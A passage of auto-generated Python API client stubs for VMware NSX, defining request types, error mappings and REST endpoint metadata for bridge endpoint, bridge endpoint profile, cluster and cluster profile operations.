type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/bridge-endpoint-profiles/{bridgeendpointprofile-id}',
request_body_parameter='bridge_endpoint_profile',
path_variables={
'bridgeendpointprofile_id': 'bridgeendpointprofile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointProfile'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.bridge_endpoint_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _BridgeEndpointsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'bridge_endpoint': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpoint'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/bridge-endpoints',
request_body_parameter='bridge_endpoint',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'bridgeendpoint_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
path_variables={
'bridgeendpoint_id': 'bridgeendpoint-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'bridgeendpoint_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
path_variables={
'bridgeendpoint_id': 'bridgeendpoint-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'bridge_cluster_id': type.OptionalType(type.StringType()),
'bridge_endpoint_profile_id': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'logical_switch_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'vlan_transport_zone_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/bridge-endpoints',
path_variables={
},
query_parameters={
'bridge_cluster_id': 'bridge_cluster_id',
'bridge_endpoint_profile_id': 'bridge_endpoint_profile_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'logical_switch_id': 'logical_switch_id',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'vlan_transport_zone_id': 'vlan_transport_zone_id',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'bridgeendpoint_id': type.StringType(),
'bridge_endpoint': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpoint'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/bridge-endpoints/{bridgeendpoint-id}',
request_body_parameter='bridge_endpoint',
path_variables={
'bridgeendpoint_id': 'bridgeendpoint-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpoint'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpoint'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpointListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'BridgeEndpoint'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.bridge_endpoints',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ClusterStub(ApiInterfaceStub):
def __init__(self, config):
# properties for backuptoremote operation
backuptoremote_input_type = type.StructType('operation-input', {})
backuptoremote_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
backuptoremote_input_value_validator_list = [
]
backuptoremote_output_validator_list = [
]
backuptoremote_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster?action=backup_to_remote',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
create_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for get_0 operation
get_0_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
})
get_0_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_0_input_value_validator_list = [
]
get_0_output_validator_list = [
]
get_0_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get_1 operation
get_1_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
get_1_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_1_input_value_validator_list = [
]
get_1_output_validator_list = [
]
get_1_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for joincluster operation
joincluster_input_type = type.StructType('operation-input', {
'join_cluster_parameters': type.ReferenceType('com.vmware.nsx.model_client', 'JoinClusterParameters'),
})
joincluster_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
joincluster_input_value_validator_list = [
]
joincluster_output_validator_list = [
]
joincluster_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster?action=join_cluster',
request_body_parameter='join_cluster_parameters',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for removenode operation
removenode_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'force': type.OptionalType(type.StringType()),
'graceful_shutdown': type.OptionalType(type.StringType()),
'ignore_repository_ip_check': type.OptionalType(type.StringType()),
})
removenode_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
removenode_input_value_validator_list = [
]
removenode_output_validator_list = [
]
removenode_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster/{node-id}?action=remove_node',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'force': 'force',
'graceful_shutdown': 'graceful-shutdown',
'ignore_repository_ip_check': 'ignore-repository-ip-check',
},
content_type='application/json'
)
# properties for summarizeinventorytoremote operation
summarizeinventorytoremote_input_type = type.StructType('operation-input', {})
summarizeinventorytoremote_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
summarizeinventorytoremote_input_value_validator_list = [
]
summarizeinventorytoremote_output_validator_list = [
]
summarizeinventorytoremote_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster?action=summarize_inventory_to_remote',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
update_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/cluster/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'backuptoremote': {
'input_type': backuptoremote_input_type,
'output_type': type.VoidType(),
'errors': backuptoremote_error_dict,
'input_value_validator_list': backuptoremote_input_value_validator_list,
'output_validator_list': backuptoremote_output_validator_list,
'task_type': TaskType.NONE,
},
'create': {
'input_type': create_input_type,
'output_type': type.VoidType(),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterConfig'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'get_0': {
'input_type': get_0_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterNodeInfo'),
'errors': get_0_error_dict,
'input_value_validator_list': get_0_input_value_validator_list,
'output_validator_list': get_0_output_validator_list,
'task_type': TaskType.NONE,
},
'get_1': {
'input_type': get_1_input_type,
'output_type': type.VoidType(),
'errors': get_1_error_dict,
'input_value_validator_list': get_1_input_value_validator_list,
'output_validator_list': get_1_output_validator_list,
'task_type': TaskType.NONE,
},
'joincluster': {
'input_type': joincluster_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterConfiguration'),
'errors': joincluster_error_dict,
'input_value_validator_list': joincluster_input_value_validator_list,
'output_validator_list': joincluster_output_validator_list,
'task_type': TaskType.NONE,
},
'removenode': {
'input_type': removenode_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterConfiguration'),
'errors': removenode_error_dict,
'input_value_validator_list': removenode_input_value_validator_list,
'output_validator_list': removenode_output_validator_list,
'task_type': TaskType.NONE,
},
'summarizeinventorytoremote': {
'input_type': summarizeinventorytoremote_input_type,
'output_type': type.VoidType(),
'errors': summarizeinventorytoremote_error_dict,
'input_value_validator_list': summarizeinventorytoremote_input_value_validator_list,
'output_validator_list': summarizeinventorytoremote_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.VoidType(),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'backuptoremote': backuptoremote_rest_metadata,
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'get_0': get_0_rest_metadata,
'get_1': get_1_rest_metadata,
'joincluster': joincluster_rest_metadata,
'removenode': removenode_rest_metadata,
'summarizeinventorytoremote': summarizeinventorytoremote_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ClusterProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'cluster_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/cluster-profiles',
request_body_parameter='cluster_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'cluster_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
path_variables={
'cluster_profile_id': 'cluster-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cluster_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
path_variables={
'cluster_profile_id': 'cluster-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'include_system_owned': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'resource_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'include_system_owned': 'include_system_owned',
'included_fields': 'included_fields',
'page_size': 'page_size',
'resource_type': 'resource_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'cluster_profile_id': type.StringType(),
'cluster_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
request_body_parameter='cluster_profile',
path_variables={
'cluster_profile_id': 'cluster-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfile')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
